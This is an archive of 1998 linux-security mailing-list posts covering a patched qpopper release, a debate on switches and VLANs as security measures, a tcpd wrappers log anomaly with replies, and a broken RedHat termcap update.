Hi,
well, swift response!
Qualcomm has a patched qpopper (2.5)
Greetings,
Jan-Philip Velders
<jpv@jvelders.tn.tudelft.nl>
---------- Forwarded message ----------
Date: Mon, 29 Jun 1998 21:43:18 -0700
From: Praveen Yaramada <pyaramad@QUALCOMM.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Patched Qpopper2.5 release Notification.
Hello Folks,
As you are already aware that qpopper 2.41 and prior are vulnerable to
buffer overflow there by causing security breach. A patched qpopper2.5 is
made available at
http://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.5.tar.Z.
This server release is immune from all the known security holes posted in
bugtraq@netscape.org. Please upgrade or patch your server if you are
running any qpopper older than 2.5.
Many thanks to all the people who posted these bugs and patches.
Thanks
Praveen Yaramada.
From mail@mail.redhat.com Wed Jul 1 07:18:54 1998
Received: (qmail 28077 invoked from network); 1 Jul 1998 05:22:11 -0000
Received: from 3dyn40.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.40)
by mail2.redhat.com with SMTP; 1 Jul 1998 05:22:11 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id HAA30366
for <linux-security@redhat.com>; Wed, 1 Jul 1998 07:18:54 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id HAA00855
for linux-security@redhat.com; Wed, 1 Jul 1998 07:22:30 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Tue Jun 30 18:40:33 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id SAA23905
for <wolff@dutepp0.et.tudelft.nl>; Tue, 30 Jun 1998 18:42:06 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id SAA17626 for
<r.e.wolff@BitWizard.nl>; Tue, 30 Jun 1998 18:30:52 +0200
Received: (qmail 19389 invoked by uid 501); 30 Jun 1998 16:42:01 -0000
Received: (qmail 19017 invoked from network); 30 Jun 1998 16:41:36 -0000
Received: from ra.scif.com (206.202.64.7)
by mail2.redhat.com with SMTP; 30 Jun 1998 16:41:36 -0000
Received: from flowers.wiltelnsi.com (mkallen [10.2.27.152])
by ra.scif.com (8.8.8/8.8.8) with SMTP id JAA22546;
Tue, 30 Jun 1998 09:39:38 -0700 (PDT)
Message-Id: <3.0.5.32.19980630093214.00b12250@mailhost.wiltelnsi.com>
X-Sender: woody@mailhost.wiltelnsi.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Tue, 30 Jun 1998 09:32:14 -0700
To: Christopher Hicks <chicks@chicks.net>
From: Woody Weaver <woody@wiltelnsi.com>
Subject: [linux-security] Re: A switch? A router? What am I
looking for??
Cc: security@kokoro.com, firewalls@lists.gnac.net, linux-security@redhat.com
In-Reply-To: <Pine.LNX.3.96.980630015230.9657c-100000@yakko.chicks.net>
References: <3.0.5.32.19980629130441.00aa3520@mailhost.wiltelnsi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-moderate: yes
At 02:00 AM 6/30/98 -0400, Christopher Hicks wrote:>On Mon, 29 Jun 1998, Woody Weaver wrote:
>> Put in a switch to improve bandwidth, not out of a sense of security.
>
>Security in depth is good. A switch's primary purpose is and should be
>improved bandwidth. But it also helps security. MAC floods can be
>detected. That's enough to dissuade some threats. The attraction of
>packet sniffing attacks is the difficulty of detection.
I agree with Chris' statement, but I agree with mine as well.
>From the original authors comment, I deduced (incorrectly perhaps) that he
was trying to find out what a switch was, and if it would be a security
device. For a novice, imho, a switch is only a collision-domain
manipulator, *not* a secure device. In particular, I would be concerned
that a novice would drop a switch in place and believe that he was safe
against passive sniffing attacks. Far better is to make as a criterion of
the security policy which machines are able to see traffic from other
machines, and choose an appropriate appliance or procedure to enforce that
policy.
>But the principle of security in depth is the real issue I'm trying to
>address. It is often missed. Just because a switch or a firewall or a
>lock on a file cabinet isn't perfect does not mean that it shouldn't
be
>part of a complete security plan. People lock their office door then
>leave root logged in. People buy a firewall and then run their systems
>without patches or proper passwords. Bad. Bad. There are few either-or
>choices in security that shouldn't be answered "both".
Please note the first sentence does not correspond to the examples listed.
All the examples listed correspond to violations of (an implied) security
policy, *not* missing security in depth. I *like* security in depth. When
I have the luxury, I have one vendors' firewall on the perimeter, another
vendor's firewall for the interior, and specify file encryptors and
end-to-end encryption on administrative traffic. Belts and suspenders are
good things, when money/convenience is outweighed by the risk/value
computation.
What I'd like to point out (that is often missed) is that security
implementations must follow from the security policy -- not vice versa --
and that screwdrivers are not chisels even though they share some features.
If the security policy states that machine A is not to see machine B's
traffic, then the answer is not "lets buy a switch" -- its a little
deeper
than that, and it might involve buying a secure switch, but then it also
involves a good deal of thought about configuration of the switch, and so on.
>
></chris>
--woody
--
Robert Wooddell Weaver email: woody.weaver@wiltelnsi.com
Network Engineer voice: 510.358.3972
Williams Communication Solutions pager: 510.702.4334
From mail@mail.redhat.com Wed Jul 1 07:18:58 1998
Received: (qmail 28171 invoked from network); 1 Jul 1998 05:22:14 -0000
Received: from 3dyn40.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.40)
by mail2.redhat.com with SMTP; 1 Jul 1998 05:22:14 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id HAA30370
for <linux-security@redhat.com>; Wed, 1 Jul 1998 07:18:58 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id HAA00870
for linux-security@redhat.com; Wed, 1 Jul 1998 07:22:33 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Tue Jun 30 19:22:17 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id TAA24408
for <wolff@dutepp0.et.tudelft.nl>; Tue, 30 Jun 1998 19:22:47 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id TAA17651 for
<r.e.wolff@BitWizard.nl>; Tue, 30 Jun 1998 19:11:33 +0200
Received: (qmail 797 invoked by uid 501); 30 Jun 1998 17:22:41 -0000
Received: (qmail 32677 invoked from network); 30 Jun 1998 17:22:12 -0000
Received: from ra.scif.com (206.202.64.7)
by mail2.redhat.com with SMTP; 30 Jun 1998 17:22:12 -0000
Received: from flowers.wiltelnsi.com (mkallen [10.2.27.152])
by ra.scif.com (8.8.8/8.8.8) with SMTP id KAA23859;
Tue, 30 Jun 1998 10:20:19 -0700 (PDT)
Message-Id: <3.0.5.32.19980630094647.00b25300@mailhost.wiltelnsi.com>
X-Sender: woody@mailhost.wiltelnsi.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Tue, 30 Jun 1998 09:46:47 -0700
To: "Youn Gonzales" <ispmgr@clas.net>
From: Woody Weaver <woody@wiltelnsi.com>
Subject: [linux-security] Re: A switch? A router? What am I
looking for??
Cc: <firewalls@lists.gnac.net>, <linux-security@redhat.com>
In-Reply-To: <006901bda436$ebba8260$813112d0@burrito.run.for.the.border>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-moderate: yes
At 09:52 AM 6/30/98 -0500, you wrote:>A switch can be used as a security device. Many of the newer switches can be
>configured to support multiple VLANs which prohibit machines on one VLAN
[...]
You know, I considered talking about vlans when I started writing up
definitions. But I figured that if the guy didn't know what a switch was,
a vlan would just further confuse him.
imho, a vlan is a device to manipulate broadcast domains (and by
implication collision domains) and again *not* a security device. The
"best" use of vlans is when you have distributed users and want to
share
resources among just those users, e.g. engineering is IP network X, sales
is IP network Y, but their cubes are distributed among half a dozen floors
-- I can now plug-n-play among the switch community without regard for
physical location. Now I can have broadcast level services, such as DHCP,
without extensive configuration of user machines.
Will vlan enabled switches be part of a security design? Perhaps. Right
now, I just don't know how hardened the switch will be against security
attacks -- they weren't _designed_ with security in mind. Has cisco ever
fixed the syn-loop attack against their catalyst switches? Does this give
you a warm and fuzzy feeling that other problems won't be found? Do you
want to use an appliance with potentially unknown characteristics in your
security implementation?
Please note that I very much accept the answer that in some designs the
answer is YES! Security is always something personal to a specific site,
and a particular time and computation.
--woody
--
Robert Wooddell Weaver email: woody.weaver@wiltelnsi.com
Network Engineer voice: 510.358.3972
Williams Communication Solutions pager: 510.702.4334
From mail@mail.redhat.com Thu Jul 2 08:10:12 1998
Received: (qmail 16630 invoked from network); 2 Jul 1998 06:13:24 -0000
Received: from 3dyn113.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.113)
by mail2.redhat.com with SMTP; 2 Jul 1998 06:13:24 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id IAA00761
for <linux-security@redhat.com>; Thu, 2 Jul 1998 08:10:12 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id IAA00719
for linux-security@redhat.com; Thu, 2 Jul 1998 08:13:41 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 1 19:14:02 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id TAA09275
for <wolff@dutepp0.et.tudelft.nl>; Wed, 1 Jul 1998 19:14:58 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id TAA18480 for
<r.e.wolff@BitWizard.nl>; Wed, 1 Jul 1998 19:03:44 +0200
Received: (qmail 14274 invoked by uid 501); 1 Jul 1998 17:14:51 -0000
Received: (qmail 5913 invoked from network); 1 Jul 1998 17:10:26 -0000
Received: from gw-pini.funkey.com (HELO linux.rpini.com) (193.192.247.149)
by mail2.redhat.com with SMTP; 1 Jul 1998 17:10:26 -0000
Received: from remo (remo.rpini.com [193.192.247.151])
by linux.rpini.com (8.8.8/8.8.8) with SMTP id SAA21092
for <linux-security@redhat.com>; Wed, 1 Jul 1998 18:11:37 +0200
Message-Id: <199807011611.SAA21092@linux.rpini.com>
X-Sender: remo@hades.rpini.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1
Date: Wed, 01 Jul 1998 19:10:08 +0200
To: linux-security@redhat.com
From: Remo Pini <rp@rpini.com>
Subject: [linux-security] Re: A switch? A router? What am I
looking for??
In-Reply-To: <3.0.5.32.19980630094647.00b25300@mailhost.wiltelnsi.com>
References: <006901bda436$ebba8260$813112d0@burrito.run.for.the.border>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-moderate: yes
>imho, a vlan is a device to manipulate broadcast domains (and by
>implication collision domains) and again *not* a security device. The
>"best" use of vlans is when you have distributed users and want to
share
>resources among just those users, e.g. engineering is IP network X, sales
>is IP network Y, but their cubes are distributed among half a dozen floors
Oh yes they are. Swiss military for example accepts a non-routed VLAN as a
secure subnet (in an ATM LANE environment). VLANs are/will be a vital part
of our LAN-security (especially combined with a MAC-based VLAN-policy).
Greets,
Remo
-----------------------------------------------------
Fatum favet volenti. (anon)
-----------------------------------------------------
Remo Pini ++++++++++++++++++++++++ T: +41 1 350 28 88
Pini Computer Trading +++++++++++ N: +41 79 216 15 51
http://www.rpini.com/ +++++++++ Email: rp@rpini.com
-----------------------------------------------------
[mod: Remo, get rid of those non-ascii chars in your .sig. --REW]
From mail@mail.redhat.com Thu Jul 2 08:12:05 1998
Received: (qmail 18566 invoked from network); 2 Jul 1998 06:15:14 -0000
Received: from 3dyn113.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.113)
by mail2.redhat.com with SMTP; 2 Jul 1998 06:15:14 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id IAA00766
for <linux-security@redhat.com>; Thu, 2 Jul 1998 08:12:05 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id IAA00740
for linux-security@redhat.com; Thu, 2 Jul 1998 08:15:34 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 1 21:57:50 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id VAA11265
for <wolff@dutepp0.et.tudelft.nl>; Wed, 1 Jul 1998 21:58:19 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id VAA18585 for
<r.e.wolff@BitWizard.nl>; Wed, 1 Jul 1998 21:47:05 +0200
Received: (qmail 26803 invoked by uid 501); 1 Jul 1998 19:58:08 -0000
Received: (qmail 26280 invoked from network); 1 Jul 1998 19:57:34 -0000
Received: from www.inx.de (root@195.21.255.251)
by mail2.redhat.com with SMTP; 1 Jul 1998 19:57:34 -0000
Received: by www.inx.de (Smail3.2.0.96inx)
from hellraiser.mindstar.bogus (195.21.34.183) with esmtp
id <m0yrT0V-000oltC>; Wed, 1 Jul 1998 21:57:31 +0200 (MET DST)
Received: (from pluto@localhost)
by hellraiser.mindstar.bogus (8.8.8/8.8.8) id VAA21252;
Wed, 1 Jul 1998 21:59:07 +0200
Date: Wed, 1 Jul 1998 21:59:07 +0200 (CEST)
From: Pluto <pluto@pizzaservice.de>
X-Sender: pluto@hellraiser.mindstar.bogus
Reply-To: pluto@pizzaservice.de
To: Linux Security <linux-security@redhat.com>
Subject: tcpd anomaly
In-Reply-To: <199807010231.EAA18365@iconnect.de>
Message-ID:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Salve,
I'm protecting hades with the tcpd wrappers and had no problems so far,
at least none that I noticed.
Today happend something strange. An attacker got a connect on a
protected port from a not allowed IP:
> Unusual System Events
> =-=-=-=-=-=-=-=-=-=- BTW, thanks for that tool.
> Jul 1 03:34:56 hades in.null[18321]: twist
> slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null 2>>
> /var/log/get_em_err
This is OK and has happend a dozen times a week in the last year. He
comes from ch.ibm.net where only de.ibm.net is allowed and is routed to a
little homegrown script that logs some stuff like traceroute and finger.
> Jul 1 03:35:00 hades in.null[18324]: twist
> slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null 2>>
> /var/log/get_em_err
And again, still OK.
> Jul 1 03:35:05 hades in.telnetd[18327]: connect from
> slip139-92-93-124.hol.ch.ibm.net
But now that! Hasn't happend before and I think the fast reconnects
after 4-5 sec. are on purpose, nobody has done this like that before and I
got a lot more of this in the logfiles.
Seems like tcpd is still busy with the last two scripts and doesn't even
look at the connect. Or do I miss something? Have the scripts have to have
a '&' at the end of the line to prevent it? Or is it a bug of the
tcpd
wrappers?
Yours troubled
Pluto - SysAdmin of Hades
We are NSA, your mail will be scrutinzed, resistance is futile! =:-)
Key fingerprint: 1F 3F EA 94 D0 56 A6 86 4D 19 C4 56 6C F9 43 44
Boren's Laws:
(1) When in charge, ponder.
(2) When in trouble, delegate.
(3) When in doubt, mumble.
From mail@mail.redhat.com Fri Jul 3 11:33:55 1998
Received: (qmail 24747 invoked from network); 3 Jul 1998 09:36:58 -0000
Received: from 3dyn207.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.207)
by mail2.redhat.com with SMTP; 3 Jul 1998 09:36:58 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id LAA04178
for <linux-security@redhat.com>; Fri, 3 Jul 1998 11:33:55 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id LAA00994
for linux-security@redhat.com; Fri, 3 Jul 1998 11:37:16 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Thu Jul 2 13:58:02 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id NAA20598
for <wolff@dutepp0.et.tudelft.nl>; Thu, 2 Jul 1998 13:59:37 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id NAA19126 for
<r.e.wolff@BitWizard.nl>; Thu, 2 Jul 1998 13:48:22 +0200
Received: (qmail 2092 invoked by uid 501); 2 Jul 1998 11:57:28 -0000
Received: (qmail 284 invoked from network); 2 Jul 1998 11:56:29 -0000
Received: from umbilical.porcupine.org (HELO spike.porcupine.org)
(168.100.189.1)
by mail2.redhat.com with SMTP; 2 Jul 1998 11:56:29 -0000
Received: by spike.porcupine.org (VMailer, from userid 100)
id 45875E0CF0; Thu, 2 Jul 1998 07:55:29 -0400 (EDT)
Subject: [linux-security] Re: tcpd anomaly
To: linux-security@redhat.com
Date: Thu, 2 Jul 1998 07:55:29 -0400 (EDT)
In-Reply-To:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus> from
Pluto at "Jul 1, 98 09:59:07 pm"
Organization: Wietse Venema, White Plains, NY, USA
X-Time-Zone: USA EST, 6 hours behind central European time
X-Mailer: ELM [version 2.4ME+ PL15 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <19980702115529.45875E0CF0@spike.porcupine.org>
From: wietse@porcupine.org (Wietse Venema)
X-moderate: yes
Sorry for discussing sysadmin stuff in a security group. Normally
people contact me via direct email when they have a problem.
A new tcpd instance is run for each connection; each tcpd instance
handles its connection independently from other connections.
So, when telnet connections from the same site are given different
treatment, something has changed from one connection to the other,
and it is up to you to figure out what.
Very likely, something has changed locally to your system.
I suggest that you check out the rules with the tcpdchk and tcpdmatch
configuration checking utilities. These programs are part of the
tcp wrappers source distribution; your software vendor may or may
not have bundled them with the system.
Wietse
P.S. Appending "&" to a "twist" command will screw it
up: the shell
will close the standard input of the twisted command, so it can't
read from the network.
Pluto:> Salve,
>
> I'm protecting hades with the tcpd wrappers and had no problems so
far,
> at least none that I noticed.
>
> Today happend something strange. An attacker got a connect on a
> protected port from a not allowed IP:
>
> > Unusual System Events
> > =-=-=-=-=-=-=-=-=-=-> BTW, thanks for that tool.
>
> > Jul 1 03:34:56 hades in.null[18321]: twist
> > slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> > 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null
2>>
> > /var/log/get_em_err
>
> This is OK and has happend a dozen times a week in the last year. He
> comes from ch.ibm.net where only de.ibm.net is allowed and is routed to a
> little homegrown script that logs some stuff like traceroute and finger.
>
> > Jul 1 03:35:00 hades in.null[18324]: twist
> > slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> > 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null
2>>
> > /var/log/get_em_err
>
> And again, still OK.
>
> > Jul 1 03:35:05 hades in.telnetd[18327]: connect from
> > slip139-92-93-124.hol.ch.ibm.net
>
> But now that! Hasn't happend before and I think the fast reconnects
> after 4-5 sec. are on purpose, nobody has done this like that before and I
> got a lot more of this in the logfiles.
> Seems like tcpd is still busy with the last two scripts and doesn't
even
> look at the connect. Or do I miss something? Have the scripts have to have
> a '&' at the end of the line to prevent it? Or is it a bug of
the tcpd
> wrappers?
>
> Yours troubled
>
> Pluto - SysAdmin of Hades
> We are NSA, your mail will be scrutinzed, resistance is futile! =:-)
> Key fingerprint: 1F 3F EA 94 D0 56 A6 86 4D 19 C4 56 6C F9 43 44
>
> Boren's Laws:
> (1) When in charge, ponder.
> (2) When in trouble, delegate.
> (3) When in doubt, mumble.
>
> --
> ----------------------------------------------------------------------
> Please refer to the information about this list as well as general
> information about Linux security at http://www.aoy.com/Linux/Security.
> ----------------------------------------------------------------------
>
> To unsubscribe:
> mail -s unsubscribe linux-security-request@redhat.com < /dev/null
>
>
>
From mail@mail.redhat.com Fri Jul 3 11:33:50 1998
Received: (qmail 24742 invoked from network); 3 Jul 1998 09:36:55 -0000
Received: from 3dyn207.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.207)
by mail2.redhat.com with SMTP; 3 Jul 1998 09:36:55 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id LAA04174
for <linux-security@redhat.com>; Fri, 3 Jul 1998 11:33:50 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id LAA00979
for linux-security@redhat.com; Fri, 3 Jul 1998 11:37:12 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Fri Jul 3 10:50:37 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id BAA28772
for <wolff@dutepp0.et.tudelft.nl>; Fri, 3 Jul 1998 01:32:26 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id BAA19524 for
<r.e.wolff@BitWizard.nl>; Fri, 3 Jul 1998 01:21:06 +0200
Received: (qmail 26419 invoked by uid 501); 2 Jul 1998 23:32:15 -0000
Received: (qmail 14525 invoked from network); 2 Jul 1998 23:25:17 -0000
Received: from unknown (HELO warp.bascservice.org) (root@203.188.253.61)
by mail2.redhat.com with SMTP; 2 Jul 1998 23:25:17 -0000
Received: from thing.annexgrp.org (tunl.annexgrp.org [203.188.254.166])
by warp.bascservice.org (8.8.7/8.8.7) with ESMTP id FAA05418;
Fri, 3 Jul 1998 05:21:10 +0600
Received: from localhost (annex@localhost)
by thing.annexgrp.org (8.9.0/8.9.0) with SMTP id FAA10910;
Fri, 3 Jul 1998 05:23:38 +0600
Date: Fri, 3 Jul 1998 05:23:32 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: Pluto <pluto@pizzaservice.de>
cc: Linux Security <linux-security@redhat.com>
Subject: [linux-security] Re: tcpd anomaly
In-Reply-To:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus>
Message-ID: <Pine.BOO.3.96.980703051741.10894A-100000@thing.annexgrp.org>
Organization: Annex Group (Bangladesh)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Wed, 1 Jul 1998, Pluto wrote:
| Seems like tcpd is still busy with the last two scripts and doesn't even
| look at the connect. Or do I miss something? Have the scripts have to have
| a '&' at the end of the line to prevent it? Or is it a bug of the
tcpd
well.. I used to use a boobytrap on port 139 for outside IPs with TCPD..
who's job was to mail me the source IP immediately.. until.. I got hit by
this person.. who used 28 diff IPs to hit port 139 repeatedly.. and it was
so hard on my machine.. that the HD LED never went out before I power
cycled it after like 15 mins of non responsiveness :(
I had an "&" at the end
this is something you should be aware of when running something like an
external shell script or a program from tcpd using twist or without..
---
Annex
From mail@mail.redhat.com Fri Jul 3 11:37:12 1998
Received: (qmail 27361 invoked from network); 3 Jul 1998 09:40:15 -0000
Received: from 3dyn207.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.207)
by mail2.redhat.com with SMTP; 3 Jul 1998 09:40:15 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id LAA04192
for <linux-security@redhat.com>; Fri, 3 Jul 1998 11:37:12 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id LAA01092
for linux-security@redhat.com; Fri, 3 Jul 1998 11:40:34 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Thu Jul 2 16:54:00 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id QAA23487
for <wolff@dutepp0.et.tudelft.nl>; Thu, 2 Jul 1998 16:55:42 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id QAA19277 for
<r.e.wolff@BitWizard.nl>; Thu, 2 Jul 1998 16:44:27 +0200
Received: (qmail 20420 invoked by uid 501); 2 Jul 1998 14:54:31 -0000
Received: (qmail 20191 invoked from network); 2 Jul 1998 14:54:23 -0000
Received: from ns.chapwin.com (root@209.167.122.121)
by mail2.redhat.com with SMTP; 2 Jul 1998 14:54:23 -0000
Received: from chapwin.com (rick@gateway.chapwin.com [209.167.122.120])
by ns.chapwin.com (8.8.7/8.8.7) with ESMTP id JAA07359;
Thu, 2 Jul 1998 09:53:26 -0500
Message-Id: <199807021453.JAA07359@ns.chapwin.com>
Date: Thu, 2 Jul 1998 09:53:53 -0500 (CDT)
From: rick@chapwin.com
Reply-To: rick@chapwin.com
Subject: [linux-security] Re: tcpd anomaly
To: pluto@pizzaservice.de
cc: linux-security@redhat.com
In-Reply-To:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus>
MIME-Version: 1.0
Content-Type: TEXT/plain; CHARSET=US-ASCII
X-moderate: yes
Have you looked at xinetd? I have it running on our firewall and it
even allows you to bind services to a single interface. This way there
is no connect then disconnect as with tcp_wrappers.
-Rick
--
+-------------------------------------------+
| "No matter where you go...there you are." |
| -Buckaroo Banzai |
+-------------------------------------------+---------------------
ChapWin Consulting Inc. rick@chapwin.com
Red Lake Internet / Ear Falls Internet www.chapwin.net
Box 882 (807) 727-2606
Red Lake, ON P0V 2M0 FAX (807) 727-3594
------------------------------------------------------------------
Member: Northern Ontario Coalition of Internet Providers
------------------------------------------------------------------
From mail@mail.redhat.com Sun Jul 5 09:58:04 1998
Received: (qmail 14175 invoked from network); 5 Jul 1998 08:02:42 -0000
Received: from 3dyn101.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.101)
by mail2.redhat.com with SMTP; 5 Jul 1998 08:02:42 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id JAA03062
for <linux-security@redhat.com>; Sun, 5 Jul 1998 09:58:04 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA00900
for linux-security@redhat.com; Sun, 5 Jul 1998 10:02:42 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Sat Jul 4 13:42:09 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id BAA11923
for <wolff@dutepp0.et.tudelft.nl>; Sat, 4 Jul 1998 01:07:57 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id AAA20138 for
<r.e.wolff@BitWizard.nl>; Sat, 4 Jul 1998 00:56:42 +0200
Received: (qmail 4618 invoked by uid 501); 3 Jul 1998 23:07:52 -0000
Received: (qmail 4606 invoked from network); 3 Jul 1998 23:07:51 -0000
Received: from samiam.org (HELO ankh.samiam.org) (209.133.34.27)
by mail2.redhat.com with SMTP; 3 Jul 1998 23:07:51 -0000
Received: (qmail 13004 invoked by uid 1108); 3 Jul 1998 23:07:21 -0000
Date: Fri, 3 Jul 1998 16:07:21 -0700 (PDT)
From: samiam@mr.samiam.org
X-Sender: set@hello.samiam.org
To: linux-security@redhat.com
cc: bugtraq@netspace.org
Subject: RedHat broke termcap on the 4.2 libtermcap security upgrade
Message-ID: <Pine.LNX.3.95.980703160408.12984A-100000@ankh.samiam.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
RedHat broke termcap on the 4.2 libtermcap security upgrade.
Until RedHat gets a chance to fix it, fixed RPMS are here:
http://linux.samiam.org/blackdragon
- Sam
